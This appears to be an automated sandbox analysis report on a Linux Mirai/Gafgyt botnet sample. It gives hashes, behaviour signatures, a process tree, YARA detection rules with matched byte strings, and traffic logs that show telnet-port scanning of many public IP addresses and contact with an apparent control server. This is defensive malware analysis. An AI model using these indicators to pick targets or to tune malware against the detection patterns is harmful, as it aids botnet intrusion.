Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Linux Analysis Report SLdtSSVlj2

Overview

General Information

Sample Name:SLdtSSVlj2
Analysis ID:553479
MD5:6b355f508658f7fbe9c91fad5d09d6b5
SHA1:72a9d43e568016e0384a39e391391498695328bd
SHA256:9010857d2724b141fc1ccc742e9d5d41ff50e102878d196fd9726458b0864c19
Tags:32elfmiraisparc
Infos:

Detection

Gafgyt Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Yara signature match
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Creates hidden files and/or directories
Sample has stripped symbol table

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:553479
Start date:15.01.2022
Start time:00:44:21
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 43s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:SLdtSSVlj2
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.spre.troj.lin@0/4@0/0
Warnings:
Show All
  • Connection to analysis system has been lost, crash info: Unknown
  • TCP Packets have been reduced to 100

Process Tree

  • system is lnxubuntu20
  • SLdtSSVlj2 (PID: 5267, Parent: 5104, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/SLdtSSVlj2
  • systemd New Fork (PID: 5288, Parent: 1)
  • journalctl (PID: 5288, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5309, Parent: 1)
  • dbus-daemon (PID: 5309, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5321, Parent: 1)
  • whoopsie (PID: 5321, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5322, Parent: 1860)
  • pulseaudio (PID: 5322, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5323, Parent: 1)
  • rsyslogd (PID: 5323, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • fusermount (PID: 5324, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5325, Parent: 1)
  • systemd-journald (PID: 5325, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5326, Parent: 1334)
  • pulseaudio (PID: 5326, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5337, Parent: 1)
  • rtkit-daemon (PID: 5337, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5340, Parent: 1)
  • systemd-logind (PID: 5340, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 5398, Parent: 1320)
  • Default (PID: 5398, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5399, Parent: 1)
  • dbus-daemon (PID: 5399, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • gdm3 New Fork (PID: 5400, Parent: 1320)
  • Default (PID: 5400, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5401, Parent: 1)
  • systemd-journald (PID: 5401, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5402, Parent: 1)
  • whoopsie (PID: 5402, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5403, Parent: 1)
  • rsyslogd (PID: 5403, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5404, Parent: 1334)
  • pulseaudio (PID: 5404, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5407, Parent: 1)
  • systemd-logind (PID: 5407, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 5464, Parent: 1320)
  • Default (PID: 5464, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5465, Parent: 1)
  • dbus-daemon (PID: 5465, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5466, Parent: 1)
  • systemd-journald (PID: 5466, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5491, Parent: 1)
  • dbus-daemon (PID: 5491, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5496, Parent: 1)
  • whoopsie (PID: 5496, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5501, Parent: 1)
  • rsyslogd (PID: 5501, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5523, Parent: 1334)
  • pulseaudio (PID: 5523, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5527, Parent: 1)
  • dbus-daemon (PID: 5527, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5538, Parent: 1)
  • systemd-journald (PID: 5538, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5592, Parent: 1)
  • whoopsie (PID: 5592, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5595, Parent: 1)
  • rsyslogd (PID: 5595, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5599, Parent: 1)
  • rsyslogd (PID: 5599, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5600, Parent: 1)
  • whoopsie (PID: 5600, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5602, Parent: 1)
  • gpu-manager (PID: 5602, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5603, Parent: 1)
  • generate-config (PID: 5603, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5604, Parent: 1)
  • gpu-manager (PID: 5604, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5605, Parent: 1)
  • generate-config (PID: 5605, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5606, Parent: 1)
  • gpu-manager (PID: 5606, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5607, Parent: 1)
  • generate-config (PID: 5607, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5608, Parent: 1)
  • systemd New Fork (PID: 5609, Parent: 1)
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SLdtSSVlj2SUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x14908:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14978:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x149e8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14a58:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14ac8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14d38:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14d90:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14de8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14e40:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14e98:$xo1: oMXKNNC\x0D\x17\x0C\x12
SLdtSSVlj2Mirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
  • 0x12c68:$x1: POST /cdn-cgi/
  • 0x14768:$s1: LCOGQGPTGP
  • 0x14280:$s4: QWRGPTKQMP
SLdtSSVlj2MAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
  • 0x12c68:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
SLdtSSVlj2JoeSecurity_Mirai_5Yara detected MiraiJoe Security
    SLdtSSVlj2JoeSecurity_Mirai_8Yara detected MiraiJoe Security
      Click to see the 2 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      5275.1.000000002ac99f32.000000004dded084.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
      • 0x554:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x5c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x63c:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x6b0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x724:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xa50:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xaa8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xb00:$xo1: oMXKNNC\x0D\x17\x0C\x12
      5276.1.000000002ac99f32.000000004dded084.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
      • 0x554:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x5c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x63c:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x6b0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x724:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x9f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xa50:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xaa8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0xb00:$xo1: oMXKNNC\x0D\x17\x0C\x12
      5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
      • 0x14908:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14978:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x149e8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14a58:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14ac8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14d38:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14d90:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14de8:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14e40:$xo1: oMXKNNC\x0D\x17\x0C\x12
      • 0x14e98:$xo1: oMXKNNC\x0D\x17\x0C\x12
      5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
      • 0x12c68:$x1: POST /cdn-cgi/
      • 0x14768:$s1: LCOGQGPTGP
      • 0x14280:$s4: QWRGPTKQMP
      5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
      • 0x12c68:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
      Click to see the 51 entries

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: SLdtSSVlj2Virustotal: Detection: 53%Perma Link
      Source: SLdtSSVlj2ReversingLabs: Detection: 62%

      Networking:

      barindex
      Connects to many ports of the same IP (likely port scanning)Show sources
      Source: global trafficTCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
      Uses known network protocols on non-standard portsShow sources
      Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 60001
      Source: unknownNetwork traffic detected: HTTP traffic on port 60001 -> 49312
      Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
      Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
      Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 59.56.176.218:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 42.72.218.69:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 137.130.224.50:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 2.152.239.194:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 82.28.36.35:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 95.92.170.188:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 70.10.33.63:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 185.35.40.190:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 54.87.128.116:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 166.3.148.104:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 220.81.214.84:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 178.234.197.231:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 211.166.98.72:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 147.78.208.7:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 201.142.224.189:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 191.95.69.87:2323
      Source: global trafficTCP traffic: 192.168.2.23:48182 -> 104.244.72.234:64938
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.250.128.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 131.201.241.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.38.178.37:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.207.231.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 144.136.34.215:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.205.199.200:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 193.116.192.178:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 2.253.77.90:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 41.2.78.106:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 150.49.15.206:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 46.5.63.15:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 186.124.39.177:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 60.170.213.212:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 137.223.230.40:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.66.84.84:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 167.78.97.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 43.160.110.215:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 102.58.149.163:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 119.77.144.40:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 153.228.38.115:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.49.207.162:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 220.101.127.64:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 142.214.72.142:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 35.123.66.253:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 183.73.6.130:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 70.32.78.173:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 85.180.43.201:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.1.119.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 183.47.166.215:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.150.76.241:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 190.28.192.137:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 47.1.232.88:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 206.192.117.229:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 18.44.113.87:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 37.237.120.202:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 146.96.60.183:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 155.199.2.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.91.137.101:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 162.217.84.106:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 115.11.61.201:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.229.231.82:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 2.132.53.104:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 58.197.90.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 36.240.95.197:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 132.85.182.1:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 45.109.254.21:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 217.208.101.141:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.173.178.107:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 158.202.74.167:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 184.113.61.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 114.18.178.25:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 115.121.140.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 25.34.91.246:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 171.204.233.160:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 94.77.33.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 25.237.100.108:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.39.9.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 180.100.151.116:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 200.173.78.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 42.172.34.138:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 186.218.59.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.96.112.226:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 177.254.31.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.243.113.152:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 220.202.74.14:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.169.143.232:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 91.141.67.200:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 176.6.253.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.250.246.203:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.43.173.1:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.50.22.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 118.71.161.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.108.214.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 174.24.236.178:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.26.218.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 40.125.44.53:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 155.101.124.136:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 203.116.207.247:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 193.133.17.192:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.117.69.224:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 155.227.125.37:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 149.196.12.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.36.36.74:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 101.140.137.48:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.163.250.253:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 175.255.163.44:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 139.83.212.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 38.78.129.160:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 86.135.147.183:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 133.54.125.45:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 19.42.77.176:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.176.140.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 180.241.210.253:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 150.160.31.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 51.65.62.81:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 46.38.62.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 118.175.215.86:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 45.4.148.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.117.26.98:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.228.57.188:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 130.116.254.234:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 144.0.186.41:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.67.30.19:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 129.66.107.52:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.42.15.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 221.233.77.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 145.157.214.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 111.28.16.160:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 81.138.248.26:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 149.179.68.242:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 113.192.207.250:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 165.155.226.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 170.236.84.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 9.26.139.61:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.92.199.12:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.87.141.173:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 193.189.142.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.163.128.67:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.204.113.153:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 191.236.99.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 80.40.174.76:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 201.201.99.208:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.76.246.98:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 68.231.95.103:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 121.233.243.238:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.14.231.72:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 201.25.71.174:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 183.155.240.64:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 194.97.121.109:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 170.25.63.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 48.135.200.202:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.67.149.155:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 191.7.143.64:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 131.250.249.2:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.236.217.146:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 120.231.196.220:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 200.250.73.7:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.89.168.209:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 94.215.22.60:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 134.59.35.21:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 216.64.220.225:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 220.167.173.220:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 201.138.128.79:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 25.208.182.171:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 186.162.227.134:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 220.89.118.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 200.77.77.175:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 184.151.198.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 218.114.49.85:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 168.244.238.165:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 135.12.53.219:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 183.185.247.91:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 153.226.177.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 185.85.206.198:60001
